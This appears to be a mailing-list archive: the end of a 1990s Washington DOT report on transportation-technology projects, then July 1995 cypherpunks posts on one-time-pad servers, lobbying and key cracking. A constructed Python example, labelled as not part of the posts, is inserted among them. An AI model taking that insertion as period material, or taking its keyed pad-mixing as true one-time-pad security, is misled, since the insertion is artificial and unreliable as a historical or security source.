Traveler Information Center that provided office workers with greater 
access to flexible, reliable, safe, and time efficient alternatives to 
single occupancy vehicle commuting.  The prototype allowed us to gauge 
the impact of applying ATIS technology to enhancing transit and 
paratransit.  It also allowed us to judge the viability of Traveler 
Information Centers as a way for downtown centers to meet trip reduction 
requirements set by the State of Washington.
The project was funded by WSDOT and FTA.  Work was conducted as a 
partnership between the Bellevue TMA and the University of Washington.  
The project was originally scheduled to begin 7/1/92 and end 10/31/93.  
The FTA funding period ended up being for 15 months, starting 9/30/92, so 
no-cost time extensions were requested of both the FTA and WSDOT in order 
that both funding periods ended at the same time.
Most of the employees in the office building (Bellevue Place) were
surveyed.  Since Microsoft doesn't do surveys, focus groups with 
Microsoft employees were done the last week in April, 1993.  The project 
was expanded to cover more buildings in downtown Bellevue.  Will also use 
a public-private partnership utilizing pagers donated by PacTel (now 
Air-Touch).  The telephone equipment was purchased, the initial 
programming of it completed, and it was tested.  A media event showcasing 
the project was done by the U.W. on September 28, 1993.  83 applications 
were received by the TMA as of November 2, 1993.  The kiosk was opened 
for use in Bellevue Place on November 15, 1993.
Three ride groups were formed.  Some of the interesting statistics as of 
the close of the project on April 15, 1994 are:  496 rides offered, 145 
rides sought, 6 confirmed ride matches.  Preliminary conclusions are that 
people were much more willing to offer rides than to accept a ride.  The 
draft technical report has been written and was submitted to TRAC the end 
of August, 1994, for editing and processing.  The initial editing 
generated substantial suggested improvements, so the report was sent back 
to the P.I. for modification in September, 1994.  The draft report has 
been circulated and review comments received.  The P.I. plans on 
incorporating review comments for the final report during the first week 
of July, 1995.

* In-Vehicle Signing and Variable Speed Limit Demonstration.
(Larry Senn) The project is unique in that its objective is the
enhancement of motorists' safety on freeway facilities through the display
of variable speed limits and other safety messages based on traffic and 
roadway conditions.  These displays are presented using variable message 
signs and in-vehicle equipment.  The proposed project includes the 
implementation of a variable speed limit and motorist alerting system 
featuring the use of low cost in-vehicle radio receivers with 
alphanumeric displays.  The system is to be installed on a forty mile 
section of I-90 approximately 40 miles east of Seattle in the vicinity of 
the Snoqualmie Pass.  The University of Washington will be responsible 
for the evaluation of the system and the experimental design.  
The installation of data stations for collection of "before" data is 
complete and data collection is underway.  Farradyne has continued the 
systems development, and has found solutions to several issues concerning 
the radio communications system and integration of the weather stations.  
FCC licenses for all sites have been obtained.  The construction contract 
with Totem Electric is underway and at least three sign bases have been 
installed.  The production of the Daktronics VMS is underway and the 
inspection of the first sign occurred on June first.  We hope to test the 
in-vehicle devices in '94-'95 using a portable transmitter, however the 
fixed sites will not have communications until '95-'96 when the entire 
project will be operational.  The UW team has conducted an in-depth 
accident analysis based on 5 years of accident data and has continued the 
development of the driving simulator that will be used to evaluate the 
in-vehicle signing equipment.  A detailed evaluation plan has been 
submitted to NHTSA and has been tentatively approved pending some minor 
corrections.  

* Seattle to Portland Inter-city ITS Corridor Study and
Communication Plan.  (Morgan Balogh)  We are in the initial stage of this
project.  There are three main objectives of the project.  The first 
objective is to develop a plan to reduce congestion and improve safety 
along the Seattle to Portland I-5 corridor utilizing Intelligent 
Vehicle-Highway Systems (IVHS) technologies.  The second objective is to 
identify the communications network needed to support the IVHS for the 
corridor.  Additionally, evaluate alternatives and provide 
recommendations for this network to support WSDOT's other, non-IVHS,
intra-departmental communications requirements along this corridor.  The 
third objective is to develop general recommendations for a statewide 
WSDOT communication network utilizing the corridor communications 
analysis.  
State matching funds have been identified and approved.  An Agreement 
between the FHWA and the WSDOT for the Seattle to Portland Inter-city ITS 
portion of this project has been made. 
A request for a service contract to select/hire a consultant was 
developed and published September 13, 1993.  The consultant proposals 
went through the first stage of the evaluation process.  This stage chose 
the top 3 proposals.  The representative of each team was asked to give 
an oral presentation on December 7, 1993.  From these presentations David 
Evans and Associates was chosen to be the prime consultant.  The 
consultant began work May 2, 1994.  The consultant has completed 
Technical Memorandum #4, Draft ITS Corridor Plan in May and is developing 
a draft communications plan.  

* Portland to Boise ITS Corridor Study.  (Eldon L. Jacobson)
This project is to develop a plan to identify Intelligent Transportation 
System technologies that should improve some of the known transportation 
problems in the Portland to Boise corridor.  One of the known problems is 
the poor weather conditions that can rapidly appear in the Columbia 
Gorge and the Blue Mountains.  The corridor includes roads on both sides
of the Columbia River, two railroads, and barge shipping.
The planned $400,000 consultant study is anticipated to be funded by 
FHWA, ITD, ODOT, and WSDOT.  A draft agreement between the FHWA and the 
three state DOTs has been drafted by the FHWA Region office.  The revised 
draft proposal was circulated for final comments and support letters.  
The proposal was submitted to the FHWA the day before the due date of 
August 1, 1994.  Approval from D.C. was received the middle of January, 
1995, provided the scope-of-work is approved by the FHWA region office.  
The draft scope-of-work was circulated for comments the end of February, 
1995.  The FHWA approval is expected mid-March, 1995, with the RFP 
planned late in March or April, 1995.
Kimley-Horn and Associates, Inc., is the consultant that was selected to 
do the study.  The scope-of-work and cost estimate are being worked on 
prior to signing the contract.

%	.c.Seattle to Vancouver, B.C., and Seattle to Spokane ITS 
Corridor Study;  (Bill Legg)  This project is to develop a plan to 
identify Intelligent Transportation System (formerly IVHS) technologies 
that should improve some of the known transportation problems in the two 
corridors.  The two corridors may be studied separately, or together, 
depending on whether one or both are approved for funding by the FHWA.  
The planned consultant study is anticipated to be funded by FHWA and 
WSDOT.  
Interviews for final consultant selection will be held on June 22nd.  
Work on this project will begin in the 3rd quarter of 1995.

%	.c.Assessment of ATIS in Washington State.;  (Morgan Balogh) This 
project is primarily funded by FHWA discretionary moneys.  It will 
provide an early evaluation of 4 ATIS in Washington state (FLOW, Traffic 
Reporter, Bellevue Smart Traveler, and the proposed Canadian border 
crossing information system).  The project will develop a matrix of ATIS 
so that appropriate criteria for judging success can be developed and 
applied.  The project will also recommend direction for future ATIS 
development in the state.  Start date for project was 10/01/92 and the 
completion date for the project is 4/30/94.
Tasks completed to date include: (1) Identified classifying system and 
definitions of success for this project.  (2) Designed metrics and 
instruments for assessing Flow.
Delays in the installation of the Vax at TSMC have delayed the 
implementation of Traffic Reporter and consequently the evaluation of 
Traffic Reporter.  That problem has been corrected and the evaluation 
continued.  The final report was submitted to the Research Office in 
March, 1995.  

%	.c.IVHS Data and Information Structure.;  (Morgan Balogh or 
Daniel Dailey)  The overall objective of this project is to develop a 
framework in which to understand, select, and apply wireless data 
communications technology to IVHS development in Washington State.  It 
will (1) review the state of the art of wireless data communications, (2) 
examine promising wireless communication alternatives, (3) perform a 
limited field test of selected wireless data communications, and (4) 
provide the basis for an overall plan to integrate wireless data 
communications into a regional IVHS network.  The final report for this 
project is due December 31, 1994.
The final report was submitted to the Research Office in March, 1995.

%	.c.Investigation of Video Image Tracking.;  (Morgan Balogh or 
Nancy Nihan)  First generation video imaging systems provide "trip-wire" 
type detection, that is they mimic the performance of inductance loops.  
The newer video imaging tracking system not only gathers loop type data 
but "fingerprints" vehicles to provide tracking capabilities.  Vehicle 
tracking provides travel time and origin destination information which 
has been historically difficult to obtain.
The proposed video imaging system for this project is the MOBILIZER, 
which is provided by Condition Monitoring Systems (CMS) and is in the 
prototype stages of development.  
This project will test collected data for reliability and range of 
usefulness, compare cost effectiveness and total life-cycle cost of the 
CMS system to that of traditional loop detector systems, and if cost 
effective, incorporate the system in the WSDOT Traffic Systems Management 
Center.  The final report for this project is due August 31, 1995.
Most of the technical problems with the MOBILIZER have been worked out 
and testing is continuing.

%	.c.IVHS Backbone Design and Demonstration.;  (Larry Senn or Dan 
Dailey)  This project will (1) design a  demonstration architecture for a 
regional IVHS backbone for the Puget Sound area and (2) construct this 
backbone in order to demonstrate how different types of data gathered 
from distinct agencies can be integrated in a single application.  The 
backbone will be designed to (a) improve interagency and 
multi-jurisdictional sharing of data without disrupting existing 
operations, (b) support existing investment in IVHS technology and system 
development, (c) encourage expansion and innovation, and (d) be 
compatible with federal efforts to develop a national IVHS architecture.  
The backbone will support traffic data from a multitude of sources while 
making data accessible in a clearly defined manner on a geographically 
distributed network.  This all will be done in an open systems model that 
supports a distributed computing environment, is extensible to larger 
areas, and easily allows new agencies to participate.  
The T1 link to the TSMC and all hardware elements to set up the 
communication have been installed.  Software to extract the data is 
operational.  Loop data has been interfaced to the GIS application.  
Software is being developed to make use of the loop data for future 
research.  The final report is being written.  

%	.c.Demonstration of ATIS/ATMS Data Fusion in a Regional IVHS.;  
(Larry Senn or Dan Dailey)  This project proposes to design, construct, 
and demonstrate a data fusion system for use in a regional IVHS system.  
The fusion system will combine data for multi-agency and 
multi-jurisdictional sources to provide a more accurate, real-time 
picture of the transportation system.  This fusion system will operate in 
a distributed computing environment that encourages interagency 
cooperation.  
The computer has been ordered and WSDOT and Metro have been contacted.  
An IVHS application has been written which displays both congestion data 
from loops and real time position of transit vehicles on a GIS based 
map.  King County Metro is being contacted for an improved map database.  
A report is being written in conjunction with an IEEE Intelligent 
Vehicles Conference '95.  

%	.c.IVHS - Network and Data Fusion.;  (Larry Senn or Dan Dailey)  
This Federally funded project will progress from specific regional issues 
investigated in other related projects and generalize by creating key 
network and fusion components that are transferable to other regions and 
countries.  The project will (1) investigate, design, and document an 
encoding scheme, including ways to include temporal information with 
spatial information, for standardization of traffic and traveler 
information, (2) use this encoding scheme to demonstrate a layer between 
application and transport layers, and (3) work with another related IVHS 
research center to use the encoding scheme in a demonstration of its use 
in inter-regional IVHS communication.  
The investigator has started investigation of FIPS spatial data standard 
in detail and determined that the full standard is unwieldy for the 
design of our data encoding system.  Adopting an object oriented paradigm 
to construct self defining data streams.  The methodology for 
constructing the self defined data streams is the encoding stream 
promised for this project.  

%	.c.Investigation of Automatic Vehicle Location Systems for 
Traveler Information.;  (Larry Senn or Mark Haselkorn)  This project will 
use Metro AVL information to improve information available to travelers 
and transportation managers.  
Metro AVL data can now be displayed on any X-terminal connected to the 
Internet and has been demonstrated many times.  This concludes the 
research portion of the project and a draft final is being formatted in 
preparation for review.  

%	.c.Ramp Control via Neural Network Control.;  (Larry Senn or 
Deirdre Meldrum)  This project will develop and test a new ramp metering 
algorithm by using an artificial neural network congestion predictor and 
a multi-variable control system.
Artificial neural networks have been constructed and tested.  Promising 
results have been obtained with 1 minute data being used to predict 
volumes and occupancies 1 minute ahead, and somewhat less promising 
results have been obtained with 5 minute data.  The draft technical 
report has been sent to the Research Office for review.

%	.c.Fuzzy Logic Ramp metering.;  This project will move toward 
developing the neural network forecasting and fuzzy logic control system 
including in depth testing using models and on the existing SC&DI 
system.  If budget and time allows the system will be implemented within 
this project.  This project is just starting.  

%	.c.SWIFT - Seattle Wide-area Information For Travelers.;  (Larry 
Senn, Mark Haselkorn, Dan Dailey)  This project is a $7.4 million IVHS 
Operational test of an FM sideband data system which will be used to 
deliver traffic and transit information.  Data will be extracted from 
WSDOT's freeway ramp control computer, Metro Transit's vehicle location 
system, and augmented with information from Metro Traffic Control.  The 
information will be formatted and sent to Seiko Telecommunication System 
for transmission to devices.  The devices include a watch (or pager) 
based on Seiko's Message Watch, Delco Electronics' Telepath car radio 
that includes a GPS to give distance and bearing to a destination, and a 
palm top computer that will be supplied by IBM which will provide bus 
locations and graphic displays of traffic conditions.  Etak will supply 
geo-coding, mapping, and data entry interfaces.  The test will occur in 
1996 after the devices are programmed and developed.  
The contract with the SWIFT project team was signed on January 10, 1995 
and work has commenced.  An evaluation plan from SAIC was submitted at 
the March 14 Steering Committee meeting and was accepted by the team with 
minor changes.  The UW team is working extensively on the network 
required to deliver SWIFT information.  This project is proceeding on 
schedule.  

%	.c.SWIFT Smart Traveler:  (Larry Senn, Dan Dailey)  This project 
is a companion to the SWIFT project and will allow ad hoc ridesharing 
amongst UW employees.  The large employer base combined with the 
availability of desktop computers and the campus network should allow for 
greater number of ride matches than found in previous projects.  Web 
pages have been created, the server is being set up, and geocoding has 
started to establish rideshare locations.  

%	.c.NEXRAD: NEXt Generation Weather RADar.;  (Larry Senn, Tom 
Seliga)  This project is investigating potential applications for the new 
doppler weather radar in transportation.  The potential uses of accurate 
short term weather predictions include better maintenance scheduling and 
transit operation improvements from early snow warnings, wind warnings 
for ferries, and for research into the traffic impacts of inclement 
weather.  
The investigators have obtained a disdrometer to assess the distribution 
of drop sizes in the region, are developing an algorithm for tracking 
storms, have arranged for data access from the weather radar, and have 
obtained a SUN workstation for use in the project.  Phase 2 of this 
project has been funded and will continue the work.  There will be no 
report for Phase 1 as it was a preliminary investigation.  

%	.c.Increasing Awareness of Transportation Options Through 
Riderlink.;  (Eldon L. Jacobson)  This FHWA/FTA Operation Action Program 
project intends to develop a Metro database infrastructure that can be 
used to make transit information (and other information) available at 
selected work sites.  Originally the intent was to team up with US. West 
Community Link's planned videotext service (The original project was 
titled: Increasing Public Awareness of Transportation Options Through 
Videotext).  Since the videotext service has been delayed or abandoned, 
the use of videotext was replaced by planning on using existing computer 
networks of some of the employers in the Overlake area between Redmond 
and Bellevue.
Metro assigned Catherine Bradshaw to coordinate the project.  Initial 
planning and coordination work began in March, 1994.  A detailed 
evaluation plan dated June 21, 1994, has been submitted.  Quarterly 
reports are being submitted.  The following three documents are 
available: Concept Document, Requirements Document, and Evaluation Plan.  
I have been able to access the Riderlink initial data pages from my 
office over the Internet.  During January, 1995, Metro publicized the 
project and made Riderlink available on a World Wide Web site on the 
Internet to disseminate the information to existing networks at employer 
sites.  All the Overlake TMA sites have connections to Riderlink.  As of 
the end of February, 1995, nearly 4,000 people from all over the world 
have accessed Riderlink.  Metro has continued to include more bus 
schedules and route maps in the Riderlink system.

%	.c.Community Transit Arterial System Area-Wide Priority (CT 
ASAP);  (Eldon L. Jacobson)  This is the IVHS operational test project 
that was earmarked by congress for Snohomish County (Community Transit).  
A proposal was submitted in February, 1994, to DC. requesting $1,500,000 
in Federal funds (75%) which will be matched with $375,000 in Community 
Transit funds (25%).  This project plans to implement the most cost 
effective portion of the Community Transit Arterial HOV study, which was 
completed in March, 1993.  That means installing a bus priority system at 
about 100 traffic signals in Snohomish County.  The North Seattle ATMS 
project will utilize the data and METRO will install the same signal 
priority system on SR 99.  This will be the first large scale area-wide 
test of a signal priority system (Pierce Transit has jumped into the 
forefront of testing signal priority, and may have a different signal 
priority system operational in Tacoma around March, 1995).
The proposal was approved and an agreement between FHWA and WSDOT has 
been drafted by FHWA.  At a coordination meeting on May 10, 1994, it was 
decided to combine this project with part of the SR 99 signal project, so 
as to only have one signal priority project within Snohomish County 
(Metro does not have authority to do any work outside King County).  The 
WSDOT-FHWA Cooperative Agreement was approved on June 17, 1994.  WSDOT 
Northwest Region is preparing the Local Agency Agreement between WSDOT 
and Community Transit.  The Local Agency Agreement has been sent to 
Community Transit.  The project may be revised in how it is coordinated 
with two other related projects in the area (the SR 99 project and the 
Metro AVI purchase project).  
As of March, 1995, the Local Agency Agreement is close to being 
finalized.  Larry Ingalls of CT is developing a work plan for the 
project.  Installation of hardware on the buses is dependent on the Metro 
region wide AVI purchase project.

.c.Additional ITS Projects

%	.c.Regional Automated Trip Planning.;  (Wayne Watanabe) King 
County Metro is participating with Community Transit and Pierce Transit 
in the development of a regional transit trip planning system.  The 
system will allow any information operator at any of the three agencies 
to enter origins and destinations within the region.  The system will 
automatically produce a trip itinerary including travel times, fares, and 
transfers.   Current effort is focused on developing geographic 
information system (GIS) hardware and software capability in Pierce and 
Snohomish counties.  King County is nearly done with its GIS component.  
This project is scheduled to be complete in 1997.

%	.c.Regional Ridematch.;  (Roland Bradley) King County Metro is 
participating with Community Transit and Pierce Transit in the 
development of regional ridematching software.  The system will allow 
ridematch staff at any of the three agencies to enter ridematch requests 
into a regional database.  This system will replace an existing regional 
ridematch system that limits the ability of agencies to offer geographic 
information system based matches, match maps for customers, and on-line 
ridematching.  The project is scheduled to be complete in 1997.

%	.c.Regional Ridematch Hotline.;  (Roland Bradley) This project 
will provide one 1-800 telephone number for anyone in King, Snohomish, 
and Pierce counties to use for ridematch assistance.  This project is 
scheduled to be complete in 1996.

%	.c.Regional Fare Integration Project.;  (Candace Carlson) King 
County Metro is participating with Community Transit, Pierce Transit, 
Everett Transit, Kitsap Transit, Washington State Ferries, the RTA, PSRC, 
and the Cascadia Project to provide seamless regional fare media that 
makes it easier to make inter-county trips within the Puget Sound 
region.  The project team is currently evaluating several technologies 
including smart cards and magnetically encoded cards.  The analysis phase 
will conclude in 1995 and a demonstration of the selected technology will 
be in place by the end of 1996. 

%	.c.Smart Bus.;  (David Cantey) King County Metro is beginning the 
implementation of a smart bus strategy that will integrate electronic 
information systems on-board buses.  The current order for 360 buses 
includes J-1708 wiring which will provide the backbone of the "vehicle 
area network."  J-1708 is an SAE standard developed and adopted by ITS 
America.  A contractor has been hired to integrate the automatic 
passenger counting systems and automatic vehicle location systems on 
board the 10% of the current fleet that have APC systems installed.

.c.other Projects

%	.c.Traffic Congestion Monitoring-Urban Areas.;  (Bill Legg or 
Mark Hallenbeck) There are three basic objectives for this study.  (1) 
Develop a comprehensive understanding of the congestion monitoring needs 
and expectations of local, state, and federal governments and agencies.  
(2) Define the alternative methods for performing that monitoring 
function.  (3) Develop cost and staffing estimates that can be provided 
to state officials in decision package form, so that a monitoring system 
based on one of these alternatives can be implemented.
This project will provide a resource document that lists the potential 
methods for monitoring congestion in the state's urban areas.  It will 
describe the types of data that need to be collected, the strengths and 
limitations of each of the methods or combinations of methods that can be 
used for collecting those data, and preliminary costs for implementation 
of those data collection procedures.  The project will provide 
descriptions of both systems that can be implemented using currently 
available technologies, and those systems that rely on technologies that 
are currently experimental but may provide greater levels of information 
gathering at a lower cost than traditional methods, if the new methods 
are implemented on an urban scale.
The Phase 2 draft report is being revised to reflect comments received 
from review.

%	.c.ENTERPRISE.;  (Bill Legg )  The ENTERPRISE Program represents 
an international forum for collaborative research, development, and 
deployment ventures.  This forum will facilitate the sharing of 
technological and institutional experiences gained from the IVHS programs 
conceived and initiated by each participating entity.  The cooperative 
and collaborative objectives of the ENTERPRISE Program provide for a more 
efficient use of resources than a series of independent initiatives.  The 
synergistic effect of this forum is an accelerated implementation of IVHS 
programs.  Current members of ENTERPRISE aside from WSDOT include; CDOT, 
AzDOT, MinnDOT, IDOT, MichDOT, NCDOT, Maricopa County DOT in AZ. FHWA, 
Ministry of Transportation of Ontario, Transport Canada, and 
Rijkswaterstaat (Netherlands DOT). Others considering joining are NYDOT, 
and the Federal DOT of Mexico.  ENTERPRISE holds quarterly meetings, in 
1994 that will be changed to 3 times a year.  The last meeting of 
ENTERPRISE was held in April 1994.  The next meeting will be in 
September, 1994 followed by a December 1994 meeting to be held in 
Seattle.  I have notes as well as minutes of previous meetings.  In 
conjunction with the September meeting ENTERPRISE will cosponsor the 2nd 
annual Rural IVHS conference with IVHS America.  The first Rural IVHS 
conference was held in February, 1993, it was sponsored by ENTERPRISE.  
ENTERPRISE is the major backer of ITIS, which is the development of an 
international standard for communications between the roadside and 
vehicles.  ENTERPRISE is also working on joint funding of several project 
proposals submitted by member organizations.  One project that is 
currently underway is HERALD, which is investigating using an AM 
sub-carrier to deliver road and construction information to motorists in 
rural areas.  ENTERPRISE submitted two proposals to FHWA as demonstration 
projects; the first is a second phase of the HERALD project, the second 
is a wide scale MAYDAY project.  FHWA accepted both of these projects for 
funding, they are now just getting underway; the interagency agreements 
and contracts are being developed and signed by the involved parties.  
Since WSDOT is a partner in a second funded MAYDAY operational test we 
will be working closely with ENTERPRISE to avoid duplication in effort 
and to share information.  I will use this report to provide updates on 
the ENTERPRISE operational tests.
The latest meeting for this group was held in Phoenix in April.  The next 
meeting will be in Minnesota in September in conjunction with the 1995 
Rural ITS conference.  The 1996 rural ITS conference will be held in 
Spokane, WSDOT will be the host agency.

%	.c.Accident Risks Using Roadway Geometrics.;  (Eldon L. Jacobson, 
Fred L. Mannering)  The work is being done by John Milton, a WSDOT 
graduate student.  The primary objective of this project is to test the 
statistical validity of the accident prediction method WSDOT is 
developing and utilizing.  The findings of this research will be used to 
develop a weighted equation for use in the Department's safety program.  
The data has been collected and most of the literature review has been 
completed.  Development and testing of accident frequency models began at 
the end of December, 1994.

%	.c.Advanced Transportation Technology Application Policy Plan.;  
(Bill Legg) This effort is looking at establishing ITS, or in this case 
Advanced Transportation Technology, as a new policy area in the 
Transportation Policy Plan for Washington State.  The first subcommittee 
meeting on this effort will be held on July 11th.  A second meeting will 
be held in August.


- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Fri, 14 Jul 95 06:53:15 PDT
To: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Subject: Re: OTP server..
In-Reply-To: <Pine.3.89.9507131817.A10819-0100000@khijol>
Message-ID: <Pine.A32.3.91.950714095006.11806M-100000@JAGUAR.ZOO.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Ed Carp [khijol Sysadmin] wrote:

> On Fri, 14 Jul 1995, Black Unicorn wrote:
> 
> > >How about WWW one time pad servers? You browse to your
> > >favorite OTP server, which has a random number generator
> > >running in the background. You tell it to give you a block
> > >of X bytes, and mail it to persons 1, 2, 3, ... N.
> > 
> > I think you're trusting the server a GREAT deal.
> 
> Why is that?  The randomness of the data can be easily checked...

Because if the server is compromised to KEEP the data that it mails to 
you and those other people, you can have a PERFECTLY random OTP, and 
because of the particulars of XOR, your communication has been compromised.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Fri, 14 Jul 95 07:01:42 PDT
To: cypherpunks@toad.com
Subject: Re: Fight, or Roll Over?
Message-ID: <36063.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In message Thu, 13 Jul 1995 16:12:16 -0700,
  tcmay@sensemedia.net (Timothy C. May)  writes:
>
> There was once talk, in April of '93, about the Washington, D.C.
> Cypherpunks group adopting "lobbying" as their own special focus area,
> with educational visits to Congressional aides and attendance at
> crypto-related hearings. Nothing came of this, for whatever reasons.

My cut on why it failed is that lobbying is too hard to do effectively on a
part time basis, and those attending that meeting realised it.

On a full time basis, lobbying is expensive, and requires that you raise
tons of money. The EFF found tons of money, and sponsored last year's
Digital Telephony disaster. He who pays the piper names the tune. EFF
got lots of corporate money, and "liked" the 94 DT bill.
So they're gone.

> say one thing: the leaders of EFF may have realized what a trap lobbying
> can become, and have chosen to instead focus on other areas.)

I read this in their actions too.

> Anyway, Cypherpunks is a worldwide, technological-oriented group. We can

Cypherpunks write code?

There is nothing vaguely pro-government about much of strong cryptography.
Tim's sig, fall of governments, and all that. Why should they listen to us?
Write code. Send money to EPIC and ACLU, let them lobby.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Fri, 14 Jul 95 07:04:13 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: Legislation question...
In-Reply-To: <199507140331.AA07147@tyrell.net>
Message-ID: <Pine.A32.3.91.950714100142.11806T-100000@JAGUAR.ZOO.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Phil Fraering wrote:

> I may be a bit behind the times, but I have a question
> about the "ban crypto-anarchy" legislation as well as
> the Exon amendment:
> 
> Isn't legislation in this country supposed to start in the
> House and _then_ move to the Senate for approval?

Only ones that involve money.  The House was given the Power of the Purse 
by the original Constitutional Congress.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Fri, 14 Jul 95 11:04:13 PDT
To: cypherpunks@toad.com
Subject: Russians seek expert help
Message-ID: <2340@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


A colleague from Russia sent me an email that I excerpt (with 
permission):

Forwarded message follows:

> Upon my return to Russia I have met with
> one of the best information protection & computer
> data security firms in Russia.  They have
> their own developments in the field of computer
> security and, notably, the special journal
> devoted to the cryptography and other information
> protection technics as well as legal aspects
> of these technologies. It is the single and thus
> best publication of this kind in Russia.
> 
> They have asked me to help them to get in
> touch with western specialists in the field
> of law & information technology protection.
> They would be happy to publish some articles (translations,
> of course) and find other ways of cooperation.
> 
> I suggest that either you personally or colleagues
> of yours would be interested in communicating
> on these matters with Russian specialists.
> 
> Their contact e-mail is hotline@confident.spb.su
> You may address the message to Petr Kuznetsov,
> he is a director of this firm.
> 
> cc: Peter Kouznetsov
> 

-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087     Rain. Sun. Rain. Sun. Rain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Fri, 14 Jul 95 02:14:49 PDT
To: cypherpunks@toad.com
Subject: Re: OTP server..
In-Reply-To: <v02130500ac2cc7c4390a@[205.219.167.38]>
Message-ID: <Pine.SOL.3.91.950714101031.4143D-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 14 Jul 1995, Black Unicorn wrote:

> doug@eng.auburn.edu wrote:
>> How about WWW one time pad servers? You browse to your
>> favorite OTP server, which has a random number generator
>> running in the background. You tell it to give you a block
>> of X bytes, and mail it to persons 1, 2, 3, ... N.
>> [...]
>> Thoughts?
>>
> I think you're trusting the server a GREAT deal.

A small addition to the protocol whereby the recipient gives the random 
data the once-over with a personal IDEA key would be sufficient to 
eliminate any doubts about the server.


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+
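
Added example (not part of either post, and not any list member's code): the
two OTP-server replies in this thread run side by side, Ben Samman's point
that a server which keeps the pad can undo the XOR, and Andy Brown's
suggestion of a local keyed pass over the pad. The PadServer class, the
function names and the sample message are hypothetical, and HMAC-SHA256 stands
in for IDEA, which the Python standard library does not provide.

```python
import hashlib
import hmac
import secrets


def xor(data: bytes, pad: bytes) -> bytes:
    """One-time-pad encrypt or decrypt; XOR is its own inverse."""
    if len(pad) < len(data):
        raise ValueError("pad shorter than message; a pad must never be stretched")
    return bytes(d ^ p for d, p in zip(data, pad))


def monobit_ok(pad: bytes, tolerance: float = 0.03) -> bool:
    """Crude randomness check: the fraction of 1 bits must be close to 0.5."""
    ones = sum(bin(b).count("1") for b in pad)
    return abs(ones / (len(pad) * 8) - 0.5) <= tolerance


class PadServer:
    """Hypothetical WWW pad server; retains=True models the compromised case."""

    def __init__(self, retains: bool):
        self.retains = retains
        self.log = []  # copies of issued pads kept by a compromised server

    def issue(self, nbytes: int) -> bytes:
        pad = secrets.token_bytes(nbytes)
        if self.retains:
            self.log.append(pad)
        return pad  # the same block is mailed to persons 1..N


def local_mix(pad: bytes, key: bytes) -> bytes:
    """Keyed pass over the server's pad (assumed stand-in for IDEA encryption).

    Each 32-byte block is replaced by HMAC-SHA256(key, offset || block).
    The result is only as strong as the key and the keyed function, and every
    correspondent must hold the same key to derive the same pad.
    """
    out = bytearray()
    for offset in range(0, len(pad), 32):
        block = pad[offset:offset + 32]
        digest = hmac.new(key, offset.to_bytes(8, "big") + block,
                          hashlib.sha256).digest()
        out += digest[:len(block)]
    return bytes(out)


def demo() -> dict:
    message = b"meet at the usual place at 0900"  # constructed sample plaintext
    server = PadServer(retains=True)

    # Case 1: the pad is used exactly as the server mailed it.
    pad = server.issue(4096)
    passes_check = monobit_ok(pad)            # statistically fine
    ciphertext = xor(message, pad)
    server_reads = xor(ciphertext, server.log[0])

    # Case 2: correspondents run the pad through a key the server never sees.
    shared_key = secrets.token_bytes(16)      # 128 bits, the IDEA key size
    pad2 = server.issue(4096)
    ciphertext2 = xor(message, local_mix(pad2, shared_key))
    server_guess = xor(ciphertext2, server.log[1])
    receiver_reads = xor(ciphertext2, local_mix(pad2, shared_key))

    return {
        "pad_passes_randomness_check": passes_check,
        "server_recovers_plaintext": server_reads == message,
        "server_recovers_after_mix": server_guess == message,
        "receiver_recovers_after_mix": receiver_reads == message,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```
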




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Fri, 14 Jul 95 08:36:26 PDT
To: cypherpunks@toad.com
Subject: So, where's the key?
Message-ID: <199507141533.AA17772@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The Cypherpunks Key-Cracking project is complete, but AFAIK no one's
reported the successful key. Either people haven't completed all the
key chunks they've signed out for, or something's wrong with our
methodology.

A third alternative is that the lucky lottery winner just missed the
results, and a fourth is that I just missed it.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Do you support free speech? Even when
perobich@ingr.com            | you don't like what's being said?
		 Be a cryptography user. Ask me how.


